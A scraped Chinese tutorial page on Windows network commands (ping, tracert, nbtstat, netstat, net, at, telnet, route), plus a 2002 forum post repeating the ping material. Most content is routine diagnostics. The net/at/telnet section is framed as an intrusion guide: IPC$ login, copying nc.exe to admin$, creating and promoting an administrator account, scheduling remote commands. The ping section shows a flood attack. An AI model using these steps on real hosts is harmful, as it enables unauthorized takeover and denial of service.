精华内容
下载资源
问答
  • Windows常用网络操作命令

    万次阅读 多人点赞 2018-11-06 13:59:44
    一、Ping  当您的机器不能访问Internet,首先确认是否是本地局域网的故障。假定局域网的代理服务器IP地址为192.168.0.1,您可以使用ping 192.168.0.1...一般返回ping的信息就表示本地到该主机的网络线路连通。  ...

     一、Ping

                 当您的机器不能访问Internet,首先确认是否是本地局域网的故障。假定局域网的代理服务器IP地址为192.168.0.1,您可以使用ping 192.168.0.1命令查看本机是否和代理服务器联通。此外可以测试本机的网卡是否正常工作,使用
     ping 127.0.0.1命令。一般返回ping的信息就表示本地到该主机的网络线路连通。
               但是很多服务器为了防止攻击,一般会关闭对ping的响应。所以ping一般作为测试连通性使用。ping命令后,会接收到对方发送的回馈信息,其中记录着对方的IP地址和TTL。TTL是该字段指定IP包被路由器丢弃之前允许通过的最大网段数量。TTL是IPv4包头的一个8 bit字段。例如IP包在服务器中发送前设置的TTL是128,你使用ping命令后,得到服务器反馈的信息,其中的TTL为127,说明途中一共经过了1道路由器的转发,每经过一个路由,TTL减1。

    二、Tracert

                 Tracert命令用来显示数据包到达目标主机所经过的路径(路由器),并显示到达每个节点(路由器)的时间。命令功能同Ping类似,但它所获得的信息要比Ping命令详细得多,它把数据包所走的全部路径、节点的IP以及花费的时间都显示出来。该命令比较适用于大型网络。
               Tracert 先发送 TTL 为 1 的回应数据包,当数据包上的 TTL在路由器收到后TTL自动减1 ,一旦某个服务器将TTL减1后,等于了0,路由器应该将“ICMP Time Exceeded”的消息发回源计算机,源计算机就根据收到的信息判断达到的路由器和所用时间。下次再次发送数据包时,将TTL递增 1,继续上述测试,直到目标响应或 TTL 达到最大值,从而确定路由。通过检查中间路由器发回的“ICMP 已超时”的消息确定路由。某些路由器不经询问直接丢弃 TTL过期的数据包,这在 Tracert
     实用程序中看不到,我们会显示请求超时的请求信息。下图所示,我们测试到新浪的路径经过了7道路由,同时根据上图测试ping 新浪时候,TTL=57,说明新浪的TTL初始设置为64,经过7道路由后到达本机,还剩下64-7 = 57。下图中ping www.edu.cn请求超时的反馈信息是因为路由器或服务器对ping命令做了处理,禁用了ICMP功能,所以我们收不到发给www.edu.cn服务器的反馈信息。
                                            
    三、pathping

            pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能与这两个工具所不提供的其他信息结合起来,综合了二者的功能。pathping会先显示中间的通过的路由器(类似tracert命令得到的信息),然后对每个中间路由器(节点)发送一定数量的ping包,通过统计他们对ping包响应的数据包来分析通信质量。上面也提到了,有的路由器对ping关闭了响应,所以有的节点的丢包率会达到100%,所以这种一般就是关闭了ping回复。你可以自己ping试一下。还有,对ping包丢弃程度只是节点本身对ping的处理,并不一定影响他的通信,你可以看到,关闭ping命令节点的下一个节点返回到数据是正常的,说明回复的包都成功发送回来。总之,pathping 命令在一段时间内将数据包发送到将到达最终目标的路径上的每个路由器,然后根据从每个跃点返回的数据包计算结果。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。下图所示,我们看到,达到第二个就终止了,因为第二道节点(路由器),不支持ping,然后,程序就终止不在继续往下探测了。
     

       四、 nslookup
     
           Nslookup命令用于解析域名,一般用来检测本机的DNS设置是否配置正确。如: nslookup 网站域名,即可解析出网站的IP地址。如图,可以看出解析www.163.com的时候,可以解析出它所有的IP地址,而如果网路出现异常或者无法收到服务器发送来的信息时候,会出现下面第二张图片的显示。服务器和Address代表是解析这些IP地址和域名的DNS服务器信息。比如我使用的DNS是jtjndc007.home.langchao.com,DNS服务器地址是10.100.1.11。

    如果想测试使用另外一台DNS的解析功能,可以这样手工指定使用特定的DNS来解析我们的域名,下面我们就使用了114.114.114.114这台DNS来解析www.163.com:

    五、nbtstat

    该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

    -a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。

    -A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。

    -n 列出本地机器的NETBIOS信息。

    本机的机器名为hp-8570p,拥有多块网络适配器(网卡):

    当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。

    在机器中有多块网卡的情况下,可以使用nbtstat来测试我们与服务器之间的通信是通过哪些网卡来进行数据转发的,如下面本机与172.18.4.40之间的通信就是通过“以太网 3”来进行通信的:

    六、netstat
    这是一个用来查看网络状态的命令,操作简便功能强大。

    -a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息。

    这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
    -r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。

    七、net

    这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。

    在这里,我们重点掌握几个常用的子命令。

    net view

    使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。

    net use
    把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name")。

    建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。

    net start
    使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,成功启动了telnet服务。

    net stop
    如果远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。

    net user
    查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
    1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
    2,net user abcd /del,将用户名为abcd的用户删除。
    3,net user abcd /active:no,将用户名为abcd的用户禁用。
    4,net user abcd /active:yes,激活用户名为abcd的用户。
    5,net user abcd,查看用户名为abcd的用户的情况。

    net localgroup
    查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add,

    现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态。

    net time
    这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了,除非要实现某个命令和程序的定时启动。用法:net time \\IP。

    八、at

    这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \\computer。

    表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。

    九、telnet
    功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。

    十、route

    添加路由是基本技能, 假设自己网关是192.168.0.1,要访问别的同事的192.168.2.56的pc,ping不通同事IP但可以ping通同事机器所在的网关192.168.2.1, 这时候就可以加个路由。route add 192.168.2.0 mask 255.255.255.0 192.168.2.1
            当然, 如果最后加上-p, 那就是永久路由了, 下次开机依然存在:route add 192.168.2.0 mask 255.255.255.0 192.168.2.1 -p。如果只想访问同事的机器,不想访问同事这一台机器所在的整个网段,则可以:route add 192.168.2.56 mask 255.255.255.255 192.168.2.1 -p,不想访问了则删除之:route delete 192.168.2.0。

    查看本机路由信息:

    route print

    删除本机某条路由信息:

    route delete 

     

    展开全文
  • 计算机网络的常用命令汇总

    万次阅读 多人点赞 2018-03-23 15:33:21
    在使用电脑的过程中,我们经常需要检测电脑的网络状态,这时通过使用一些网络基本命令来检测电脑的网络状态,以下,介绍几种常用的网络命令; 1、ping命令 ping 命令式用来测试TCP/IP 网络是否畅通或者网络连接...

       在使用电脑的过程中,我们经常需要检测电脑的网络状态,这时通过使用一些网络的基本命令来检测电脑的网络状态,以下,介绍几种常用的网络命令;

       1、ping命令

      ping 命令式用来测试TCP/IP 网络是否畅通或者网络连接速度的命令,其原理是根据计算机唯一标示的IP 地址,当用户给目的地址发送一个数据包时,对方就会返回一个同样大小的数据包,根据返回的数据包用户可以确定目的主机的存在,并初步判断目的主机的操作系统。

     ping www.baidu.com判断网络是否连接;

     在工作中,通常需要判断自己的主机与服务器的连接状态,这时,通常需要通过ping命令来判断,格式为:

     ping 198.1.245.224(服务器的地址)

     2、ipconfig

     该命令用于显示所有当前的TCP/TP 网络配置,刷新动态主机配置协议(DHCP)和域名系统(DNS)设置,使用不带参数的ipconfig命令可以显示所有适配器的ip 地址,子网掩码和默认网关等;


     3、netstat命令

     一般用于检测本机各端口的网络连接情况

     

      4、tracert命令

      tracert 命令是验证通往过程主机路径的实用程序,使用命令和简单,只要在tracert候命加上IP地址或者是URL即可。

     5、ftp命令

     该命令主要是实现登录ftp服务器,并从服务器上下载、上传相关文件的命令;

     在命令提示符窗口ftp 命令,显示ip 提示符,然后执行help 命令即可显示ftp 下属命令。下面介绍ftp 命令中常用的几个下属命令。
    (1)open,用于连接ftp 主机,该命令的使用方法是open 是open
    主机端口号。如果用户使用的是21 端口号,可省略。
    (2)dir,跟dos 命令一样,用于查看服务器的文件。
    (3)cd,进入某个文件夹。
    (4)get,下载文件到本地机器。
    (5)put,上传文件到过程服务器。
    (6)delete,删除远程ftp 服务器上的文件,要求用户必须有读写权限才可以成功删除。

    (7)bye/quit,退出当前联接;

     具体的使用过程:

    (1)选择开始-程序-附件-命令提示符,打开命令提示符窗口。
    (2)在命令提示符窗口中输入ftp,按回车键,进入ftp 提示符。
    (3)输入ftp 联接,如open 192.168.0.250,按回车键。
    (4)当显示user<192.168.1.250:<none>>:时,输入登录ftp 服
    务器的用户名,如frz,按回车键。
    (5)当显示password:时,输入登录ftp 服务器的密码,按回车
    键(值得注意的是在输入密码的过程中password 后什么都不会显
    示)。
    (6)如果输入密码正确,怎会显示联机用户数(即****logged in)
    并提示用户可以继续操作,输入dir,按回车键,显示ftp 服务器上
    所有共享的内容。
    (7)查看完毕后,用户可以使用get 命令下载所需资源。
    (8)如果查看后认为可以退出该服务器,可输入bye,并按回车键即可退出该连接;

    展开全文
  • 网络基本命令

    万次阅读 2005-04-09 12:56:00
    网络基本命令主题作者:老虎主题作者:老虎========================================================== 标题: 网络基本命令日期: 2002-11-09内容:ping 一.基础知识: ping-TCP/IP协议中最有用的命令之一 它给...
     
    

    网络基本命令
    主题作者:老虎

    主题作者:老虎

    ==========================================================

    标题: 网络基本命令
    日期: 2002-11-09
    内容:

    ping
    一.基础知识:
    ping-TCP/IP协议中最有用的命令之一
    它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
    Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list

    Options:
    -t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
    -a Resolve addresses to hostnames.(解析计算机NetBios名)
    -n count Number of echo requests to send.(发送 count 指定的 ECHO 数据包数,默认值为 4)
    -l size Send buffer size.(发送指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是 65,527)
    -f Set Don't Fragment flag in packet.(数据包中发送“不要分段”标志)
    -i TTL Time To Live.(在对方的系统里停留的时间)
    -v TOS Type Of Service.(服务类型)
    -r count Record route for count hops.(在“记录路由”字段中记录路由跳点所经过的路径。count 可以指定最少 1 台,最多 9 台计算机)
    -s count Timestamp for count hops.(记录记录路由跳点的缓存时间)
    -j host-list Loose source route along host-list.(利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9)
    -k host-list Strict source route along host-list.(利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9)
    -w timeout Timeout in milliseconds to wait for each reply.(指定超时间隔,单位为毫秒)
    destination-list (指定要 ping 的远程计算机)

    其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是Request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。

    二.使用实例

    -t: 不停的ping…………,直到你按下Ctrl-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,无实例。

    -a:
    C:\>ping -a 218.19.49.213
    Pinging SJJ [218.19.49.213] with 32 bytes of data: 【正在发送 32 字节的包到 :218.19.49.213】
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116 【正确抵达/大小32字节/消耗时间 62ms/停留时间]
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Ping statistics for 218.19.49.213: 【资料统计】
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
    从上面就可以知道IP为218.19.49.213的计算机NetBios名为SJJ。

    -n
    在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
    C:\>ping -n 50 218.19.49.213

    Pinging 218.19.49.213 with 32 bytes of data:

    Reply from 218.19.49.213: bytes=32 time=71ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
    Reply from 218.19.49.213: bytes=32 time=60ms TTL=116

    Ping statistics for 218.19.49.213:
    Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 50ms, Maximum = 71ms, Average = 57ms

    从以上我就可以知道在给218.19.49.213发送50个数据包的过程当中,返回了50个,这50个数据包当中返回速度最快为50ms,最慢为71ms,平均速度为57ms。

    -l
    在默认的情况下windows的ping发送的数据包大小为32byte,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byte,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令(网络风暴,不可轻易使用)。
    c:/)ping -l aaaaaa -t xxx.xxx.xxx.xxx
    这样它就会不停的向xxx.xxx.xxx.xxx计算机发送大小为aaaaaabyte的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。

    -f
    在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
    -i
    用于帮助你检查网络运转情况的。

    -r
    在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:


    C:\>ping -n 1 -r 9 218.19.49.213(发送一个数据包,最多记录9个路由)

    Pinging 218.19.49.213 with 32 bytes of data:

    Reply from 218.19.49.213: bytes=32 time=80ms TTL=116
    Route: 61.187.70.42->
    61.187.134.253 ->
    61.187.255.82 ->
    61.187.255.69 ->
    202.97.40.102 ->
    61.140.0.1 ->
    61.140.1.9 ->
    61.144.0.53 ->
    61.144.0.65

    Ping statistics for 218.19.49.213:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 80ms, Maximum = 80ms, Average = 80ms
    从上面我就可以知道从我的计算机到218.19.49.213一共通过了这几个路由。

    -s
    此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

    -j
    利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

    -k
    利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

    -w
    此参数没有什么其他技巧。

    ping命令的其他技巧:
    1.在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
    "DefaultTTL"=dword:000000ff
    255---FF
    128---80
    64----40
    32----20
    2.通过Ping检测网络故障的典型次序

    正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

    ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

    ping 本机IP——这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

    ping 局域网内其他IP——这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

    ping 网关IP——这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

    ping 远程IP——如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

    ping localhost——localhost是个操作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

    ping http://www.yahoo.com/——对这个域名执行Ping命令,你的计算机必须先将域名转换成IP地址,通常是通过DNS服务器。如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。顺便说一句:你也可以利用该命令实现域名对IP地址的转换功能。

    如果上面所列出的所有Ping命令都能正常运行,那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示你所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。


    61.187.255.82 ->
    61.187.255.69 ->
    202.97.40.102 ->
    61.140.0.1 ->
    61.140.1.9 ->
    61.144.0.53 ->
    61.144.0.65

    Ping statistics for 218.19.49.213:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 80ms, Maximum = 80ms, Average = 80ms
    从上面我就可以知道从我的计算机到218.19.49.213一共通过了这几个路由。

    -s
    此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

    -j
    利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

    -k
    利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

    -w
    此参数没有什么其他技巧。

    ping命令的其他技巧:
    1.在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
    "DefaultTTL"=dword:000000ff
    255---FF
    128---80
    64----40
    32----20
    2.通过Ping检测网络故障的典型次序

    正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

    ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

    ping 本机IP——这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

    ping 局域网内其他IP——这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

    ping 网关IP——这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

    ping 远程IP——如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

    ping localhost——localhost是个操作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

    ping http://www.yahoo.com/——对这个域名执行Ping命令,你的计算机必须先将域名转换成IP地址,通常是通过DNS服务器。如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。顺便说一句:你也可以利用该命令实现域名对IP地址的转换功能。

    如果上面所列出的所有Ping命令都能正常运行,那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示你所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些


    ---------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    Tracert

    一、基础知识
    tracert:是验证通往远程主机路径的实用程序
    Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

    Options:
    -d 使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名。
    -h maximum_hops Maximum number of hops to search for target.(指定搜索到目标地址的最大跳跃数 )
    -j host-list Loose source route along host-list.(按照主机列表中的地址释放源路由 )
    -w timeout Wait timeout milliseconds for each reply.(指定超时时间间隔,程序默认的时间单位是ms)
    主要功能:判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。

    二. 实例
    1.如果我们想了解自己计算机与目标计算机http://www.adsl4u.net/之间详细的传输路径信息。在dos提示符下键入:

    C:/>tracert http://www.adsl4u.net/

    Tracing route to http://www.adsl4u.net/ [211.154.211.3]
    over a maximum of 30 hops:

    1 50 ms 40 ms 50 ms 61.187.71.219
    2 40 ms 40 ms 50 ms 61.187.70.41
    3 40 ms 40 ms 50 ms 61.187.134.254
    4 40 ms 40 ms 50 ms 61.187.255.81
    5 40 ms 41 ms 50 ms 61.187.255.70
    6 50 ms 50 ms 50 ms p-4-0-r1-c-gdgz-1.cn.net [202.97.40.101]
    7 80 ms 80 ms 80 ms 202.97.38.162
    8 80 ms 80 ms 81 ms 202.96.12.38
    9 80 ms 80 ms 80 ms 202.106.192.158
    10 81 ms 80 ms 80 ms 202.96.13.134
    11 81 ms 80 ms 80 ms 211.154.209.26
    12 80 ms 80 ms 80 ms 211.154.211.3

    Trace complete.

    从上面进程我们可以从知道执行结果返回数据包到达目的主机前所经历的中继站清单,并显示到达每个中继站的时间。该功能同ping命令类似,但它所看到的信息要比ping命令详细得多,它把你送出的到某一站点的请求包,所走的全部路由都告诉你,并且通过该路由的ip是多少,通过该ip的时延是多少?通过这些时间,我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。

    如果我们在Tracert命令后面加上一些参数,还可以检测到其他更详细的信息,(在此不作详细实例),eg:使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名


    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    Netstat
    一.基础知识
    netstat:观察网络连接状态的实用工具
    Netstat网络命令可以显示当前正在活动的网络连接的详细信息,例如可以显示以太网的统计信息、显示所有协议的使用状态,这些协议包括TCP协议、UDP协议以及IP协议等、路由表和网络接口信息,可以让用户得知目前总共有哪些网络连接正在运行。网上可以看到很多如X-netstat之类的工具,无非其界面为win界面,比较直观些,其功能与此命令差不多去。
    usage:Displays protocol statistics and current TCP/IP network connections..(显示协议与当前网络连接)

    NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

    -a Displays all connections and listening ports.(显示所有连接和侦听端口)
    -e Displays Ethernet statistics. This may be combined with the -s option.(显示以太网统计信息,可以与-s连用)
    -n Displays addresses and port numbers in numerical form.(在数字表里显示地址和端口号)
    -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.(显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip)
    -r Displays the routing table.(显示路由表信息)
    -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. (显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集)
    interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.(重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息)

    二.实例
    1.查看当前网络连接状况
    C:/>netstat /a

    Active Connections
    (端口类型)(本地地址) (外部地址) (状态)
    Proto Local Address Foreign Address State
    TCP adsl1688:telnet adsl1688:0 LISTENING 【端口类型 TCP 端口 Telnet 监听状态】
